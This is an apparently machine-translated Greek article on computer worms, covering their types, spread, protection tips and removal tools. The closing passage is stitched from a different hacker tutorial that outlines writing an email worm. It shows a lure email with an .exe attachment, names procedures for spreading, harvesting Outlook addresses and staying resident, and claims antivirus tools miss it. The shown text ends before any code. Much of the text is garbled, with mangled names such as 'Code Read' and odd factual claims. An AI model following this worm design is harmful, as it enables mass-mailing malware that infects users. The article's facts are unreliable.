Ιοί υπολογιστών, κακόβουλο λογισμικό - όλα αυτά είναι καταστροφικά για το λειτουργικό σύστημα. Τι να κάνω; Πώς να νικήσετε τα μισητά προγράμματα ιών; Οι αρχάριοι χρήστες θα πουν ότι αρκεί να εγκαταστήσετε ένα antivirus. Αλλά δεν είναι τόσο απλό. Εξάλλου, για να νικήσεις έναν ιό, πρέπει να ξέρεις σε ποιον τύπο ανήκει.

Ένα από τα πιο κοινά κακόβουλα προγράμματα είναι ο ιός τύπου worm. Πώς να προστατέψετε τον υπολογιστή σας από τη διείσδυση αυτού του απρόσκλητου επισκέπτη και τι ακριβώς είναι;

Τι είναι ο «ιός σκουληκιών»;

Υπάρχει ένας τεράστιος αριθμός τύπων κακόβουλου λογισμικού υπολογιστή. Ένας από εκείνους τους ιούς που είναι αρκετά προβληματικό να απαλλαγούμε μετά τη μόλυνση είναι ο ιός «σκουλήκι του δικτύου». Αυτό είναι ένα αυτοαναπαραγόμενο πρόγραμμα υπολογιστή που διεισδύει σε τοπικά και παγκόσμια δίκτυα. Ταυτόχρονα, η σημαντική διαφορά μεταξύ ενός συνηθισμένου ιού και αυτού του κακόβουλου προγράμματος είναι ότι το δεύτερο είναι εντελώς ανεξάρτητο.

Τύποι σκουληκιών δικτύου

Τα σκουλήκια ιών υπολογιστών χωρίζονται σε τρεις κατηγορίες, οι οποίες διαφέρουν σημαντικά ως προς τα χαρακτηριστικά τους και τη βλάβη που προκαλούν στη συσκευή.

• Η πρώτη κατηγορία είναι τα σκουλήκια email. Συνήθως διανέμονται σε ένα αρχείο μέσω email. Ο χρήστης λαμβάνει μια επιστολή από άγνωστο παραλήπτη με συνημμένο. Φυσικά, υποκύπτοντας στην περιέργεια, ανοίγει ο ίδιος το συνημμένο, το οποίο περιέχει ήδη ένα σκουλήκι δικτύου, μετά το οποίο εμφανίζεται η μόλυνση.
• Η δεύτερη κατηγορία, η οποία είναι η πιο κοινή μεταξύ των κακόβουλων προγραμμάτων, είναι τα σκουλήκια που κατοικούν στη μνήμη RAM. Αυτός ο ιός δεν μολύνει τους σκληρούς δίσκους, αλλά εισάγεται στη μνήμη RAM, βλάπτοντας έτσι τα προγράμματα που εκτελούνται. Για να "πάει σπίτι" ένας τέτοιος ιός τύπου worm, αρκεί να επανεκκινήσετε τον υπολογιστή.
• Η τρίτη και πιο επικίνδυνη κατηγορία είναι τα σκουλήκια που αποθηκεύουν κώδικα στον σκληρό δίσκο της συσκευής. Χρησιμοποιούνται συχνότερα για να προκαλέσουν κάποιου είδους βλάβη στις πληροφορίες, για παράδειγμα, για να πραγματοποιήσουν επίθεση DoS. Και εδώ η επανεκκίνηση του υπολογιστή δεν θα λύσει το πρόβλημα. Μόνο συστήματα προστασίας από ιούς υψηλής ποιότητας θα βοηθήσουν εδώ, και ακόμη και τότε όχι όλα. Θα πρέπει να ξεκινήσετε τη θεραπεία του μολυσμένου δίσκου όσο το δυνατόν νωρίτερα, διαφορετικά θα πρέπει να πείτε αντίο σε ολόκληρο το λειτουργικό σύστημα.

Πώς και για ποιο σκοπό εξαπλώνονται τα σκουλήκια δικτύου;

Τέτοιοι ιοί διαδίδονται από χάκερ για την επίτευξη διαφορετικών στόχων. Ορισμένα προγράμματα έχουν σχεδιαστεί για να παρεμποδίζουν τον έλεγχο της συσκευής. Ταυτόχρονα, ο ίδιος ο χρήστης δεν θα παρατηρήσει ποτέ τι κάνει ο ιός τύπου worm. Άλλοι χρησιμοποιούν έναν μολυσμένο υπολογιστή ως τρόπο διάδοσης του ιού μέσω όλων των διαθέσιμων δικτύων, τόσο σε τοπικό όσο και σε παγκόσμιο επίπεδο.

Οι χάκερ έχουν βρει πολλούς διαφορετικούς τρόπους για να διαδώσουν το σκουλήκι. Τις περισσότερες φορές, υπάρχει ένας ιός που ο χρήστης πρέπει αρχικά να τρέξει ο ίδιος στον υπολογιστή του. Αυτό θα μπορούσε να είναι ένα ηλεκτρονικό συνημμένο ή κάποιο μίνι πρόγραμμα που έχει ληφθεί από το Διαδίκτυο. Ωστόσο, υπάρχουν και εκείνοι που δεν απαιτούν την παρέμβαση κάποιου άλλου για να μολύνουν μια συσκευή, διεισδύουν ανεξάρτητα.

Πώς να προστατεύσετε τον εαυτό σας;

Για να αποτρέψετε τη μόλυνση του υπολογιστή σας από ιό, πρέπει να γνωρίζετε τα μέτρα προστασίας. Πολλοί θα πουν ότι οποιοδήποτε πρόγραμμα προστασίας από ιούς θα είναι αρκετό, γιατί μπλοκάρει αμέσως τους ιούς όταν εισέρχονται στο σύστημα. Στην πραγματικότητα αυτό δεν είναι αλήθεια. Ένα πρόγραμμα προστασίας από ιούς δεν θα είναι σε θέση να αποτρέψει έγκαιρα έναν ιό τύπου worm από την είσοδο σε μια συσκευή, καθώς απλώς προειδοποιεί ότι ένα κακόβουλο πρόγραμμα ανιχνεύεται σε έναν συγκεκριμένο ιστότοπο. Οι περισσότεροι χρήστες δεν αποδίδουν καμία σημασία σε αυτό με την εκκίνηση ή τη λήψη ενός μολυσμένου αρχείου στον υπολογιστή τους.

Μια εξαιρετική επιλογή για προστασία έναντι αυτού του τύπου λογισμικού είναι η προληπτική τεχνολογία. Σε αντίθεση με τα συμβατικά προγράμματα προστασίας από ιούς, αυτή η τεχνολογία θα αποτρέψει τη μόλυνση του συστήματος, αντί να αναζητά ήδη γνωστούς ιούς στους σκληρούς δίσκους. Σε αυτήν την περίπτωση, ο ιός θα αποκλειστεί μόνο εάν αποτελεί πραγματική απειλή για το λειτουργικό σύστημα.

Network worm: πώς να αφαιρέσετε τον ιό;

Εάν εισέλθει κακόβουλο λογισμικό στον υπολογιστή σας, πρέπει να το αφαιρέσετε αμέσως. Πώς όμως να αφαιρέσετε έναν ιό χωρίς να καταστρέψετε το λειτουργικό σύστημα; Σε μια τέτοια κατάσταση, τα προγράμματα προστασίας από ιούς θα βοηθήσουν τους άπειρους χρήστες. Ευτυχώς, η εγκατάστασή τους δεν θα πάρει πολύ χρόνο.

• Kaspersky Rescue Disk- ένα πρόγραμμα που σας επιτρέπει να καθαρίζετε σκληρούς δίσκους από ιούς διαχειριζόμενοι το σύστημα. Για να ξεκινήσετε να εργάζεστε με το πρόγραμμα, πρέπει να εγγράψετε έναν δίσκο εκκίνησης χρησιμοποιώντας μια εικόνα ISO. Και στη συνέχεια απλά ξεκινήστε το λειτουργικό σύστημα στο BIOS μέσω αυτού.
• Εργαλείο αφαίρεσης ιών Kasperskyπιο κατάλληλο για αρχάριους χρήστες και όσους δεν έχουν κατανοήσει ακόμη τις περιπλοκές του συστήματος. Αναζητά για κακόβουλο λογισμικό στον υπολογιστή σας και το αφαιρεί από το σύστημα. Ωστόσο, δεν μπορεί να αντιμετωπίσει όλους τους τύπους ιών.

• Dr.Web CureItμπορεί κάλλιστα να αντικαταστήσει το προηγούμενο πρόγραμμα προστασίας από ιούς. Το τεράστιο μειονέκτημά του είναι ότι η σάρωση των σκληρών δίσκων διαρκεί πολύ. Μερικές φορές αυτό μπορεί να διαρκέσει περίπου δέκα ώρες. Φυσικά, μια τόσο μεγάλη σάρωση είναι σημάδι ότι το πρόγραμμα σαρώνει προσεκτικά κάθε αρχείο. Ωστόσο, δεν υπάρχουν πολλοί άνθρωποι που είναι πρόθυμοι να περάσουν όλη την ημέρα αναζητώντας έναν ιό.

Προληπτικά μέτρα

Για να προστατευτείτε από επιθέσεις χάκερ μέσω ιών, δεν είναι απαραίτητο να εγκαταστήσετε ένα σωρό ειδικά προγράμματα ασφαλείας στον υπολογιστή σας. Αρκεί να ακολουθήσετε προφυλάξεις στο δίκτυο, τότε δεν θα μπει ούτε ένα κακόβουλο αρχείο στη συσκευή.

• Εάν λάβετε ένα σημαντικό μήνυμα με συνημμένο μέσω email, μην βιαστείτε να το ανοίξετε. Πρώτα πρέπει να αποθηκεύσετε το συνημμένο στο δίσκο και, στη συνέχεια, να το εκτελέσετε χρησιμοποιώντας οποιοδήποτε πρόγραμμα περιήγησης. Ίσως, αντί για έγγραφο κειμένου ή φωτογραφία, λήφθηκε ένα εκτελέσιμο αρχείο στον υπολογιστή.
• Σε καμία περίπτωση δεν πρέπει να εκτελέσετε οποιοδήποτε πρόγραμμα που ελήφθη μέσω email από μια άγνωστη διεύθυνση. Πιθανότατα, ένα αρχείο χάκερ ήρθε στη συσκευή.
• Ακόμα κι αν το συνημμένο προήλθε από ένα ήδη οικείο e-mail, δεν πρέπει να βιαστείτε να το ανοίξετε. Πρώτα απ 'όλα, πρέπει να το σαρώσετε με ένα πρόγραμμα προστασίας από ιούς. Είναι πιθανό η διεύθυνση email από την οποία προήλθε η επιστολή να έχει ήδη μολυνθεί με κακόβουλο λογισμικό και τώρα απλώς στέλνει ένα ενημερωτικό δελτίο σε όλες τις αποθηκευμένες επαφές.
• Ένα σημάδι ότι το απεσταλμένο συνημμένο θα περιέχει έναν ιό μπορεί να είναι κάποια συγκλονιστική είδηση ​​στο μήνυμα. Αυτό είναι απλώς ένα δόλωμα για να κάνει τον χρήστη να ενδιαφέρεται για το περιεχόμενο και να ανοίξει το μολυσμένο αρχείο από περιέργεια.

Ένα σκουλήκι είναι, κατά κάποιο τρόπο, παρόμοιο με τους ιούς υπολογιστών. Αυτό το πρόγραμμα έχει επίσης τη δυνατότητα επαναλαμβανόμενης αναπαραγωγής στη μνήμη του υπολογιστή, αλλά δεν είναι πάντα ικανό να διαταράξει την απόδοση του εξοπλισμού. Το σκουλήκι δρα κρυφά και δεν είναι τόσο εύκολο να εντοπιστεί. Γίνεται αισθητό όταν κάποια προγράμματα ή το ίδιο το λειτουργικό σύστημα αρχίζουν να παγώνουν. Ταυτόχρονα, το σκουλήκι χρησιμοποιεί όλους τους διαθέσιμους πόρους υπολογιστή, συμπεριλαμβανομένου του λογισμικού.

Συνήθως, ένα σκουλήκι εισέρχεται στη μνήμη ενός υπολογιστή ως μία μόνο εφαρμογή. Σε αντίθεση με τους ιούς, αυτό το πρόγραμμα δεν είναι προσαρτημένο σε μεμονωμένες εφαρμογές. Τις περισσότερες φορές, μπορείτε να πιάσετε ένα σκουλήκι μέσω του Διαδικτύου.

Οι πιο διάσημοι ιοί είναι τα σκουλήκια.

Χαρακτηριστικό παράδειγμα είναι «Διαβασμένος κώδικας». Αυτό είναι ένα απλό σκουλήκι του Διαδικτύου που μολύνει υπολογιστές που εκτελούν λογισμικό Microsoft.Το συγκεκριμένο worm έχει ήδη καταφέρει να μολύνει περισσότερους από 6 εκατομμύρια διακομιστές σε όλο τον κόσμο. Μόλις στη μνήμη, το Code Read μπορεί να εξαπολύσει επίθεση σε έναν συγκεκριμένο υπολογιστή στο δίκτυο χρησιμοποιώντας τη μοναδική του διεύθυνση IP. Λίγο αργότερα, εμφανίστηκαν νέοι εκπρόσωποι των προγραμμάτων της ομάδας "Worm" - "Code Reed II". Αυτός είναι ένας πιο επιθετικός αδελφός, ο οποίος διατηρεί παρόμοιες αδυναμίες και αρχές δράσης. Ο πυρήνας του περιέχει ένα Trojan ικανό να υποτάξει πλήρως το λειτουργικό σύστημα. (Μπορείτε να διαβάσετε περισσότερα για το Trojan) Είναι αδύνατο να μην αναφέρουμε το NIMDA. Ο κώδικας αυτής της εφαρμογής είναι ένας συνδυασμός ενός Trojan και ενός κοινού τύπου worm. Είναι γνωστό ότι πολλαπλασιάζεται γρήγορα και έχει ήδη καταστρέψει τη διάθεση περισσότερων από 8 εκατομμυρίων διαχειριστών δικτύου.

Πώς να προστατέψετε τον υπολογιστή σας από ιούς;

Υπάρχουν αρκετοί απλοί κανόνες, η τήρηση των οποίων εγγυάται την ασφάλεια του λειτουργικού συστήματος:

• Εάν δεν είστε σίγουροι για την αξιοπιστία της πύλης, περάστε.
• χρησιμοποιήστε λιγότερα προγράμματα χωρίς άδεια.
• Δεν πρέπει να εισάγετε εντολές συστήματος υπό την υπαγόρευση ενός άγνωστου "βοηθού".

Να θυμάστε ότι κανένα antivirus δεν παρέχει 100% προστασία.

Υπάρχουν πολλοί περισσότεροι τρόποι για να προστατευτείτε από ιούς, μόνο οι πιο απλοί και αποτελεσματικοί περιγράφονται εδώ. Για να αποτρέψετε την είσοδο του ιού στον υπολογιστή σας, συνιστάται η εγκατάσταση ενός προγράμματος προστασίας από ιούς και η ενημέρωση της βάσης δεδομένων ιών συχνότερα.

Ένα σύγχρονο σκουλήκι μπορεί να εξελιχθεί και να γίνει πιο πονηρό, επομένως δεν μπορείτε να βασίζεστε μόνο σε ένα antivirus. Με τον καιρό, οι ιοί γίνονται ισχυρότεροι, αλλά δεν μπορούν να εντοπιστούν.

Άλλες μέθοδοι προστασίας.

Τα Windows διαθέτουν ένα ενσωματωμένο σύστημα προστασίας - ένα τείχος προστασίας που μπορεί να καταπολεμήσει τα εικονικά σκουλήκια.Επιπλέον, οι ειδικοί συνιστούν τη χρήση δοκιμασμένων προγραμμάτων αντί για τη λήψη όλων. Οι κλασικοί ιοί μπορούν να εξουδετερωθούν χρησιμοποιώντας το Firewall Plus - μια απλή εφαρμογή που στοχεύει στην καταπολέμηση Trojans, keyloggers και άλλων κακών πνευμάτων. Να θυμάστε ότι ο Παγκόσμιος Ιστός είναι ένα αγαπημένο μέρος για σκουλήκια, έτσι Μην ανοίγετε email από άγνωστα άτομα με συνημμένα αρχεία.

Εν τέλει.

Μια άλλη σημαντική συμβουλή. Ο κακόβουλος κώδικας έχει σχεδιαστεί για να βλάψει αρχεία και προσωπικά δεδομένα. Να γιατί, Θα πρέπει πάντα να υπάρχει ένα αντίγραφο ασφαλείας των δεδομένων σε ξεχωριστά μέσα.Θα πρέπει να θυμόμαστε ότι τα περισσότερα σκουλήκια εισέρχονται στον υπολογιστή μέσω αρχείων με δωρεάν εφαρμογές. Και να θυμάστε ότι η ανεπιθύμητη αλληλογραφία μπορεί επίσης να φέρει έναν απρόσκλητο επισκέπτη με τη μορφή email με αρχείο ZIP.

Οι τύποι σκουληκιών διαφέρουν ανάλογα με τα ακόλουθα χαρακτηριστικά: από τη μέθοδο διάδοσης του σκουληκιού - πώς μεταδίδει ένα αντίγραφο σε απομακρυσμένους υπολογιστές, με τη μέθοδο εκκίνησης ενός αντιγράφου του σκουληκιού στον μολυσμένο υπολογιστή, με τη μέθοδο εισαγωγής στο σύστημα, επιπλέον, με χαρακτηριστικά όπως πολυφορισμός, μυστικότητα και άλλους τύπους κακόβουλου λογισμικού (ιούς, Trojans).

Σχετικά με τα email worms - Email-Worm

Αυτή η κατηγορία σκουληκιών χαρακτηρίζεται από το γεγονός ότι χρησιμοποιούν email για να διαδώσουν. Το worm λειτουργεί ως εξής: στέλνει ένα αντίγραφο του εαυτού του ως συνημμένο σε ένα email ή στέλνει έναν σύνδεσμο προς το αρχείο του που βρίσκεται σε έναν από τους πόρους του δικτύου, για παράδειγμα, μια διεύθυνση URL σε ένα μολυσμένο αρχείο που βρίσκεται σε έναν ιστότοπο που έχει παραβιαστεί ή χάκερ. Ως αποτέλεσμα, όταν ανοίγετε ένα μολυσμένο συνημμένο ή έναν σύνδεσμο προς ένα μολυσμένο αρχείο, ο κώδικας τύπου worm ενεργοποιείται.

Οι πιο συνηθισμένοι τρόποι με τους οποίους τα σκουλήκια αλληλογραφίας στέλνουν μολυσμένα μηνύματα είναι:

• χρήση των υπηρεσιών MS Outlook·
• μέσω λειτουργιών MAPI των Windows.
• μέσω απευθείας σύνδεσης με τον διακομιστή SMTP, χρησιμοποιώντας τη βιβλιοθήκη αλληλογραφίας που είναι ενσωματωμένη στον κώδικα τύπου worm.

Μέθοδοι που χρησιμοποιούνται από τα σκουλήκια ηλεκτρονικού ταχυδρομείου για την εύρεση διευθύνσεων ηλεκτρονικού ταχυδρομείου για την αποστολή μολυσμένων μηνυμάτων ηλεκτρονικού ταχυδρομείου:

• μπορούν να στείλουν τον εαυτό τους σε όλες τις διευθύνσεις που βρίσκονται στο βιβλίο διευθύνσεων του MS Outlook και σε διευθύνσεις που βρίσκονται στο γραμματοκιβώτιο, ενώ ορισμένα σκουλήκια αλληλογραφίας μπορούν ακόμη και να «απαντήσουν» σε γράμματα που βρίσκονται στο γραμματοκιβώτιο.
• σαρώνουν τα αρχεία που έχουν στη διάθεσή τους στο δίσκο και επισημαίνουν γραμμές σε αυτά που προσδιορίζονται ως διευθύνσεις email.

Βασικά, τα σκουλήκια χρησιμοποιούν πολλές από τις παραπάνω μεθόδους ταυτόχρονα. Υπάρχουν και άλλες μέθοδοι για την εύρεση «ηλεκτρονικών» διευθύνσεων.

Σκουλήκια που χρησιμοποιούν αγγελιοφόρους Διαδικτύου - IM-Worm

Τα σκουλήκια αυτού του τύπου χρησιμοποιούν τη μόνη μέθοδο διάδοσης: αποστέλλονται σε επαφές που έχουν εντοπιστεί με μηνύματα στη λίστα επαφών αυτές οι επαφές περιέχουν μια διεύθυνση URL σε ένα αρχείο που βρίσκεται σε έναν από τους διακομιστές Ιστού. Αυτή η τεχνική είναι σχεδόν πανομοιότυπη με την ίδια μέθοδο διανομής που χρησιμοποιείται από τα mail worms.

IRC-Worm - σκουλήκια σε κανάλια IRC

Όπως τα σκουλήκια e-mail, αυτός ο τύπος τύπου worm έχει δύο μεθόδους εξάπλωσης μέσω καναλιών IRC.

Η δεύτερη μέθοδος: αποστολή του μολυσμένου αρχείου στον άτυχο χρήστη. Ο χρήστης που δέχεται επίθεση, σε εύθετο χρόνο, πρέπει να επιβεβαιώσει την αποδοχή αυτού του αρχείου, στη συνέχεια να το αποθηκεύσει στο δίσκο και να το ανοίξει (εκτέλεση).

Net-Worm - άλλα σκουλήκια δικτύου

Η πρώτη μέθοδος χαρακτηρίζεται από το γεγονός ότι το σκουλήκι προσπαθεί να βρει απομακρυσμένους υπολογιστές, αφού τον βρει, αντιγράφεται σε καταλόγους που είναι ανοιχτοί για ανάγνωση και εγγραφή, εάν υπάρχουν. Τα σκουλήκια αυτού του τύπου μπορούν απλώς να διασχίσουν διαθέσιμους καταλόγους δικτύου χρησιμοποιώντας λειτουργίες λειτουργικού συστήματος. Διαφορετικά, τέτοια σκουλήκια θα αναζητήσουν τυχαία υπολογιστές στο παγκόσμιο δίκτυο και, όταν συνδέονται με υπολογιστές, θα προσπαθήσουν να ανοίξουν τους δίσκους τους για πλήρη πρόσβαση.

Η δεύτερη μέθοδος είναι δυνατή εάν υπάρχουν κρίσιμα τρωτά σημεία στο λογισμικό του υπολογιστή. Αυτά τα σκουλήκια αναζητούν τέτοιους υπολογιστές και στέλνουν ένα ειδικά σχεδιασμένο πακέτο δικτύου ή αίτημα (εκμετάλλευση ευπάθειας), έτσι ο κώδικας τύπου worm διεισδύει στον υπολογιστή. Εάν το πακέτο δικτύου περιέχει μόνο μέρος του κώδικα του ιού τύπου worm, το κύριο αρχείο μεταφορτώνεται από αυτό μετά τη διείσδυση και εκκινείται για εκτέλεση.

Μια ξεχωριστή κατηγορία περιλαμβάνει σκουλήκια που χρησιμοποιούν web και διακομιστές FTP για τη διανομή τους. Η διαδικασία μόλυνσης μπορεί να χωριστεί σε δύο στάδια: στο πρώτο στάδιο, ο ιός τύπου worm διεισδύει σε έναν διακομιστή υπολογιστή και τροποποιεί τα αρχεία υπηρεσίας του διακομιστή με συγκεκριμένο τρόπο (για παράδειγμα, μπορούν να αναφερθούν στατιστικές ιστοσελίδες). Μετά από αυτό, περιμένει τους επισκέπτες που θέλουν να ζητήσουν πληροφορίες από αυτόν τον μολυσμένο διακομιστή και έτσι διεισδύει σε άλλους υπολογιστές του δικτύου.

Βασικά, τα σκουλήκια υπολογιστών χρησιμοποιούν περισσότερες από μία μεθόδους για να διαδώσουν τα αντίγραφά τους σε δίκτυα (μπορεί να έχουν δύο ή περισσότερες μεθόδους επίθεσης σε απομακρυσμένους υπολογιστές).

Worms για δίκτυα κοινής χρήσης αρχείων - P2P-Worm

Για να διεισδύσει σε ένα δίκτυο P2P, ένα τέτοιο worm αντιγράφει τον εαυτό του σε έναν κατάλογο κοινής χρήσης αρχείων, που συνήθως βρίσκεται στον τοπικό υπολογιστή. Όλα τα άλλα, κατά μία έννοια, θα συμβούν από μόνα τους, αφού το δίκτυο P2P θα αναλάβει τη δουλειά της εξάπλωσης του ιού - κάνοντας αναζήτηση στο δίκτυο, θα ενημερώσει τους απομακρυσμένους χρήστες για αυτό το αρχείο και θα παρέχει όλα τα απαραίτητα για τη λήψη του αρχείου από τον μολυσμένο υπολογιστή.

Υπάρχουν επίσης πιο περίπλοκα σκουλήκια τύπου worm P2P που μπορούν να μιμηθούν το πρωτόκολλο δικτύου ενός πραγματικού συστήματος κοινής χρήσης αρχείων και να ανταποκριθούν θετικά σε ερωτήματα αναζήτησης.

Ο κύριος τρόπος με τον οποίο τα σκουλήκια διαφέρουν μεταξύ τους είναι ο τρόπος με τον οποίο εξαπλώνεται το σκουλήκι. Άλλα σημάδια διαφοράς είναι οι μέθοδοι εκκίνησης ενός αντιγράφου του ιού τύπου worm στον μολυσμένο υπολογιστή, μέθοδοι εισαγωγής στο σύστημα, καθώς και πολυμορφισμός, μυστικότητα και άλλα χαρακτηριστικά που είναι εγγενή σε άλλους τύπους κακόβουλου λογισμικού (ιούς και Trojans).

Τύποι σκουληκιών

Ανάλογα με τον τρόπο διείσδυσης στο λειτουργικό σύστημα, τα σκουλήκια χωρίζονται σε:

• Σκουλήκια αλληλογραφίας(Mail-Worm) - σκουλήκια που εξαπλώνονται με τη μορφή μηνυμάτων email. Σε αυτήν την περίπτωση, ο ιός τύπου worm στέλνει είτε ένα αντίγραφο του εαυτού του ως συνημμένο σε ένα email ή έναν σύνδεσμο προς το αρχείο του που βρίσκεται σε κάποιον πόρο δικτύου (για παράδειγμα, μια διεύθυνση URL σε ένα μολυσμένο αρχείο που βρίσκεται σε έναν ιστότοπο που έχει παραβιαστεί ή χάκερ). Στην πρώτη περίπτωση, ο κώδικας τύπου worm ενεργοποιείται όταν ανοίγει (εκκινείται) ένα μολυσμένο συνημμένο, στη δεύτερη - όταν ανοίγει ένας σύνδεσμος προς ένα μολυσμένο αρχείο. Και στις δύο περιπτώσεις, το αποτέλεσμα είναι το ίδιο - ο κώδικας τύπου worm ενεργοποιείται.
• σκουλήκια IM(IM-Worm) - σκουλήκια που χρησιμοποιούν αγγελιοφόρους του Διαδικτύου. Τα γνωστά σκουλήκια υπολογιστών αυτού του τύπου χρησιμοποιούν τη μοναδική μέθοδο διάδοσης - την αποστολή μηνυμάτων σε επαφές που εντοπίστηκαν (από τη λίστα επαφών) που περιέχουν μια διεύθυνση URL σε ένα αρχείο που βρίσκεται σε κάποιο διακομιστή ιστού. Αυτή η τεχνική αναπαράγει σχεδόν πλήρως μια παρόμοια μέθοδο αποστολής που χρησιμοποιείται από τα mail worms.
• P2P σκουλήκια(P2P-Worm) - σκουλήκια που εξαπλώνονται χρησιμοποιώντας δίκτυα κοινής χρήσης αρχείων peer-to-peer. Ο μηχανισμός λειτουργίας των περισσότερων από αυτά τα σκουλήκια είναι αρκετά απλός - για να διεισδύσει σε ένα δίκτυο P2P, το σκουλήκι χρειάζεται μόνο να αντιγραφεί σε έναν κατάλογο κοινής χρήσης αρχείων, ο οποίος βρίσκεται συνήθως στον τοπικό υπολογιστή. Το δίκτυο P2P φροντίζει για όλες τις υπόλοιπες εργασίες για τη διάδοση του ιού - κατά την αναζήτηση αρχείων στο δίκτυο, θα ενημερώσει τους απομακρυσμένους χρήστες για αυτό το αρχείο και θα παρέχει όλες τις απαραίτητες υπηρεσίες για τη λήψη του αρχείου από τον μολυσμένο υπολογιστή. Υπάρχουν πιο πολύπλοκα σκουλήκια P2P που μιμούνται το πρωτόκολλο δικτύου ενός συγκεκριμένου συστήματος κοινής χρήσης αρχείων και ανταποκρίνονται θετικά σε αιτήματα αναζήτησης - ενώ το σκουλήκι προσφέρει ένα αντίγραφο του εαυτού του για λήψη.
• Σκουλήκια σε κανάλια IRC(IRC-Worm). Αυτός ο τύπος τύπου worm, όπως και οι ιοί τύπου worm, έχει δύο τρόπους διάδοσης του ιού τύπου worm μέσω καναλιών IRC, επαναλαμβάνοντας τις μεθόδους που περιγράφονται παραπάνω. Το πρώτο περιλαμβάνει την αποστολή μιας διεύθυνσης URL σε ένα αντίγραφο του ιού τύπου worm. Η δεύτερη μέθοδος είναι να στείλετε ένα μολυσμένο αρχείο σε κάποιον χρήστη του δικτύου. Σε αυτήν την περίπτωση, ο χρήστης που δέχεται επίθεση πρέπει να επιβεβαιώσει τη λήψη του αρχείου, στη συνέχεια να το αποθηκεύσει στο δίσκο και να το ανοίξει (να το εκτελέσει για εκτέλεση).
• Σκουλήκια δικτύου(Net-Worm) - άλλα σκουλήκια δικτύου, μεταξύ των οποίων είναι λογικό να διακρίνουμε επιπλέον τα σκουλήκια του Διαδικτύου και τα σκουλήκια LAN
  • Σκουλήκια του Διαδικτύου- σκουλήκια που χρησιμοποιούν πρωτόκολλα Διαδικτύου για εξάπλωση. Κυρίως, αυτός ο τύπος τύπου worm εξαπλώνεται χρησιμοποιώντας εσφαλμένη επεξεργασία βασικών πακέτων της στοίβας πρωτοκόλλου TCP/IP από ορισμένες εφαρμογές.
  • σκουλήκια LAN- σκουλήκια που εξαπλώνονται μέσω πρωτοκόλλων τοπικού δικτύου

Σήμερα θα σας περιγράψω την αρχή λειτουργίας ενός ιού δικτύου. Το θέμα, όπως καταλαβαίνετε, είναι πολύ επίκαιρο, αφού το 70% του προσωπικού μου γραμματοκιβωτίου είναι πάντα γεμάτο με ιούς κάθε είδους
- από μικρά αλλά κακά σκουλήκια VBS έως έργα ενάμισι μεγαγράμματος μαθητών μαθητών :) Δεν ξέρουν για την ύπαρξη του WinAPI :)

Για να διεισδύσουν σε έναν υπολογιστή, οι ιοί μπορούν είτε να χρησιμοποιήσουν σφάλματα στο λογισμικό του χρήστη (VBS+Outlook=love:)) είτε σφάλματα στο κεφάλι του χρήστη. Ας δούμε ένα παράδειγμα μιας τέτοιας ιογενούς επιστολής:

Θέμα: Αστείο
Γειά σου! Κρατήστε το ωραίο αστείο που σας υποσχέθηκα (ή όχι σε εσάς, δεν θυμάμαι :)). Αλλά κράτησέ το πάντως. Μην ανησυχείτε, στην πραγματικότητα δεν διαμορφώνει τίποτα!
Μην ξεχάσετε να ελέγξετε, παρανοϊκός :)
Καλή τύχη!
Επισύναψη: fake_format.exe

Λοιπόν, ορίστε: κάθε κουτσός χρήστης του Διαδικτύου στέλνει συνεχώς αστεία στους φίλους του και, κατά συνέπεια, δεν θυμάται πραγματικά σε ποιον υποσχέθηκε τι. το μήνυμα για την «ψεύτικη μορφοποίηση» αλλάζει τον εγκέφαλο του θύματος σε αστεία και τυφλή πίστη στα antivirus
- τελειώνει 🙂 Επιτρέψτε μου να σας υπενθυμίσω ότι οι αλγόριθμοι που περιέγραψα δεν καθορίζονται από κανένα web, avp και άλλους μαχητές.

Εν ολίγοις, εγώ ο ίδιος ήθελα ήδη να ξεκινήσω αυτό το αστείο αστείο. Το λανσάρω :)

Σφάλμα... δεν βρέθηκε το intel pentium 5!

Ω... Δεν φαίνεται να λειτουργεί; Όχι, δεν μάντεψα 🙂 Στην πραγματικότητα, ο ιός μετέφερε αμέσως το σώμα του στον σκληρό δίσκο του θύματος, εγγράφηκε για εκκίνηση και τώρα θα βρίσκεται στη μνήμη RAM (υπόδειξη: στην ιατρική ορολογία, το "RAM" είναι ΧΕΙΡΟΥΡΓΙΚΗ ΧΕΙΡΟΥΡΓΙΚΗ, οπότε να είστε προσεκτικοί;)) θύματα σύμφωνα με την αρχή που περιγράφω από εμένα στο άρθρο "Do-It-Yourself Resident Virus". Μόνο που δεν θα ελέγξει την εκκίνηση αρχείων, αλλά τη σύνδεση στο Διαδίκτυο 🙂 (στον πηγαίο κώδικα αυτή θα είναι η διαδικασία IsOnline, άρα για το μέλλον;)). Ωστόσο, ταυτόχρονα
κανείς δεν σας εμποδίζει να παρακολουθείτε την εκκίνηση αρχείων
- εξακολουθεί να είναι ιός, παρόλο που είναι ιός δικτύου. Επομένως, θα συμπεριλάβω τη διαδικασία InfectFile στη λογική. Έτσι θα χρησιμοποιήσουμε τις ακόλουθες λειτουργίες και διαδικασίες:

ISONLINE - έλεγχος σύνδεσης στο Διαδίκτυο
SENDVIRUS - μαντέψτε τρεις φορές 😉
GETMAILS - λάβετε διευθύνσεις από το Βιβλίο Διευθύνσεων του Outglitch
ΜΟΛΥΜΑΤΙΚΑ - 🙂
ΜΝΗΜΗ ΕΡΓΑΣΙΑΣ - σχεδόν το ίδιο με το προηγούμενο άρθρο, αλλά με τροποποιήσεις.

ΚΩΔΙΚΟΠΟΙΗΣΗ

Πριν ξεκινήσει η πραγματική κωδικοποίηση, αυτή τη φορά θα χρειαστούν πολλά προκαταρκτικά χάδια :) Θα εξηγήσω γιατί: για να διαβάσουμε το βιβλίο διευθύνσεων, θα έχουμε πρόσβαση στο Outlook μέσω της διεπαφής διαπρογραμμάτων και για αυτό δεν είναι κακό να το χρησιμοποιούμε βιβλιοθήκη τύπου. Το ίδιο κάντε: βιβλιοθήκη τύπων εισαγωγής έργου και κοιτάξτε εκεί... σωστά, Outlook express έκδοση 9 ή οτιδήποτε άλλο έχετε. Η ένατη έκδοση θεωρείται ότι είναι, αν δεν κάνω λάθος, από το Office2k. Εισαγόμενος; Τι σημαίνει «δεν βρίσκεται στη λίστα»; Εντάξει, συμβαίνει. Αναζήτηση χειροκίνητα
- στον κατάλογο με το γραφείο υπάρχει ένα αρχείο msoutl.olb. Αυτό είναι 😉 Τώρα γράψτε outlook_tlb στην ενότητα χρήσεων και θα έχετε πρόσβαση στα πιο οικεία μέρη στο βιβλίο διευθύνσεών σας 🙂 Ω, είμαι κάπως απασχολημένος σήμερα 😉
